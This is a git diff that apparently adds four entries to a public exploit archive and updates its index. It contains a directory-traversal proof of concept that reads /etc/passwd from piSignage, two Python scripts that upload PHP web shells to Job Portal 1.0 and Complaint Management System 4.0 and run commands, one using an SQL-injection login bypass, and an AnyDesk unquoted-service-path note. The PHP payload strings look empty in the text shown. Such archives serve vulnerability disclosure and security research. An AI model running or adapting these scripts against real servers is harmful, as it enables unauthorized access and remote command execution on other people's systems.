diff --git a/exploits/hardware/webapps/47882.txt b/exploits/hardware/webapps/47882.txt new file mode 100644 index 000000000..f3c232c51 --- /dev/null +++ b/exploits/hardware/webapps/47882.txt @@ -0,0 +1,19 @@ +# Exploit Title: piSignage 2.6.4 - Directory Traversal +# Date: 2019-11-13 +# Exploit Author: JunYeong Ko +# Vendor Homepage: https://pisignage.com/ +# Version: piSignage before 2.6.4 +# Tested on: piSignage before 2.6.4 +# CVE : CVE-2019-20354 + +Summary: +The web application component of piSignage before 2.6.4 allows a remote attacker (authenticated as a low-privilege user) to download arbitrary files from the Raspberry Pi via api/settings/log?file=../ path traversal. In other words, this issue is in the player API for log download. + +PoC: +1. Click the Log Download button at the bottom of the 'piSignage' administration page. +2. HTTP Packet is sent when the button is pressed. +3. Change the value of 'file' parameter to ../../../../../../../../../../etc/passwd. +4. You can see that the /etc/passwd file is read. + +References: +https://github.com/colloqi/piSignage/issues/97 \ No newline at end of file diff --git a/exploits/php/webapps/47881.py b/exploits/php/webapps/47881.py new file mode 100755 index 000000000..a35db8eff --- /dev/null +++ b/exploits/php/webapps/47881.py @@ -0,0 +1,47 @@ +# Exploit Title: Job Portal 1.0 - Remote Code Execution +# Google Dork: N/A +# Date: 2020-01-03 +# Exploit Author: Tib3rius +# Vendor Homepage: https://phpgurukul.com/job-portal-project/ +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=7855 +# Version: 1.0 +# Tested on: Ubuntu 16.04 +# CVE: N/A + +import argparse +import random +import requests +import string +import sys + +parser = argparse.ArgumentParser() +parser.add_argument('url', action='store', help='The URL of the target.') +args = parser.parse_args() + +url = args.url.rstrip('/') +random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10)) + +payload = '' + +file = {'file': (random_file + '.php', payload, 'text/php')} +print('> Attempting to upload PHP web shell...') +r = requests.post(url + '/admin/gallery.php', files=file, data={'submit':'1'}, verify=False) +print('> Verifying shell upload...') +r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False) + +if random_file in r.text: + print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php') + print('> Example command usage: ' + url + '/admin/uploadimg/' + random_file + '.php?cmd=whoami') + launch_shell = str(input('> Do you wish to launch a shell here? (y/n): ')) + if launch_shell.lower() == 'y': + while True: + cmd = str(input('RCE $ ')) + if cmd == 'exit': + sys.exit(0) + r = requests.get(url + '/admin/uploadimg/' + random_file + '.php', params={'cmd':cmd}, verify=False) + print(r.text) +else: + if r.status_code == 200: + print('> Web shell uploaded to ' + url + '/admin/uploadimg/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.') + else: + print('> Web shell failed to upload! The web server may not have write permissions.') \ No newline at end of file diff --git a/exploits/php/webapps/47884.py b/exploits/php/webapps/47884.py new file mode 100755 index 000000000..4af5294e9 --- /dev/null +++ b/exploits/php/webapps/47884.py @@ -0,0 +1,64 @@ +# Exploit Title: Complaint Management System 4.0 - Remote Code Execution +# Exploit Author: Metin Yunus Kandemir +# Vendor Homepage: https://phpgurukul.com/ +# Software Link: https://phpgurukul.com/complaint-management-sytem/ +# Version: v4.0 +# Category: Webapps +# Tested on: Xampp for Windows +# Description: +# There isn't any file extension control at the "Register Complaint" section of user panel. +# An unauthorized user can upload and execute php file. +# Below basic python script will bypass authentication and execute command on target server. + +poc.py + +#!/usr/bin/python + +import requests +import sys + + +if len(sys.argv) !=3: + print "[*] Usage: PoC.py rhost/rpath command" + print "[*] e.g.: PoC.py 127.0.0.1/cms ipconfig" + exit(0) + +rhost = sys.argv[1] +command = sys.argv[2] + +#authentication bypass +url = "http://"+rhost+"/users/index.php" +data = {"username": "joke' or '1'='1'#", "password": "joke' or '1'='1'#", "submit": ""} + +with requests.Session() as session: + + login = session.post(url, data=data, headers = {"Content-Type": "application/x-www-form-urlencoded"}) + + + #check authentication bypass + check = session.get("http://"+rhost+"/users/dashboard.php", allow_redirects=False) + print ("[*] Status code for login: %s"%check.status_code) + if check.status_code == 200: + print ("[+] Authentication bypass was successfull") + else: + print ("[-] Authentication bypass was unsuccessful") + sys.exit() + + #upload php file + ufile = {'compfile':('command.php', '')} + fdata = {"category": "1", "subcategory": "Online Shopping", "complaintype": " Complaint", "state": "Punjab", "noc": "the end", "complaindetails": "the end","compfile": "commmand.php", "submit": ""} + furl = "http://"+rhost+"/users/register-complaint.php" + fupload = session.post(url=furl, files= ufile, data=fdata) + + #execution + final=session.get("http://"+rhost+"/users/complaintdocs/command.php?cmd="+command) + + if final.status_code == 200: + print "[+] Command execution completed successfully.\n" + print "\tPut on a happy face.\n" + else: + print "[-] Command execution was unsuccessful." + print "\tOne bad day!" + sys.exit() + + print final.text \ No newline at end of file diff --git a/exploits/windows/local/47883.txt b/exploits/windows/local/47883.txt new file mode 100644 index 000000000..bf1fbdd4e --- /dev/null +++ b/exploits/windows/local/47883.txt @@ -0,0 +1,18 @@ +# Exploit Title: AnyDesk 5.4.0 - Unquoted Service Path +# Exploit Author: SajjadBnd +# Date: 2019-12-23 +# Vendor Homepage: http://anydesk.com +# Software Link: https://download.anydesk.com/AnyDesk.exe +# Version: Software Version 5.4.0 +# Tested on: Win10 x64 + +SERVICE_NAME: AnyDesk + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files (x86)\AnyDesk\AnyDesk.exe" --service + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : AnyDesk Service + DEPENDENCIES : RpcSs + SERVICE_START_NAME: LocalSystem \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 382fc14cc..f28194a36 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -10884,6 +10884,7 @@ id,file,description,date,author,type,platform,port 47845,exploits/windows/local/47845.txt,"Plantronics Hub 3.13.2 - Local Privilege Escalation",2020-01-03,Markus,local,windows, 47852,exploits/windows/local/47852.txt,"Adaware Web Companion 4.9.2159 - 'WCAssistantService' Unquoted Service Path",2020-01-06,ZwX,local,windows, 47880,exploits/windows/local/47880.cc,"Windows - Shell COM Server Registrar Local Privilege Escalation",2020-01-02,0vercl0k,local,windows, +47883,exploits/windows/local/47883.txt,"AnyDesk 5.4.0 - Unquoted Service Path",2020-01-07,SajjadBnd,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42182,3 +42183,6 @@ id,file,description,date,author,type,platform,port 47875,exploits/php/webapps/47875.txt,"Voyager 1.3.0 - Directory Traversal",2020-01-06,NgoAnhDuc,webapps,php, 47876,exploits/php/webapps/47876.txt,"Codoforum 4.8.3 - Persistent Cross-Site Scripting",2020-01-06,Prasanth,webapps,php, 47879,exploits/python/webapps/47879.md,"Django < 3.0 < 2.2 < 1.11 - Account Hijack",2019-12-24,"Ryuji Tsutsui",webapps,python, +47881,exploits/php/webapps/47881.py,"Job Portal 1.0 - Remote Code Execution",2020-01-07,Tib3rius,webapps,php, +47882,exploits/hardware/webapps/47882.txt,"piSignage 2.6.4 - Directory Traversal",2020-01-07,"JunYeong Ko",webapps,hardware, +47884,exploits/php/webapps/47884.py,"Complaint Management System 4.0 - Remote Code Execution",2020-01-07,"Metin Yunus Kandemir",webapps,php,